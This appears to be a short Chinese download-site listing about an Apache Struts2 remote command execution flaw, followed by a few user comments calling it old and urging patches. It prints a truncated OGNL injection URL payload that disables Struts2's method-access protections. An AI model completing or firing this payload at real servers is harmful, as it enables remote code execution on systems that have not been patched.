Apache的Struts2框架严重安全漏洞

中国风 32 0 DOCX 2019-03-14 08:03:25

Apache的Struts2框架最近出了一个很严重的漏洞,可以直接执行系统命令 http://www.163.com?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%2

用户评论
请输入评论内容
评分:
Generic placeholder image 卡了网匿名网友 2019-03-14 08:03:25

已经过时了,现在有更多其他的包,反正struts2 就不安全。

Generic placeholder image 卡了网匿名网友 2019-03-14 08:03:25

这个漏洞很多人都知道了,都不上了

Generic placeholder image 卡了网匿名网友 2019-03-14 08:03:25

最近struts2的漏洞很猖狂,得赶紧把漏洞修补上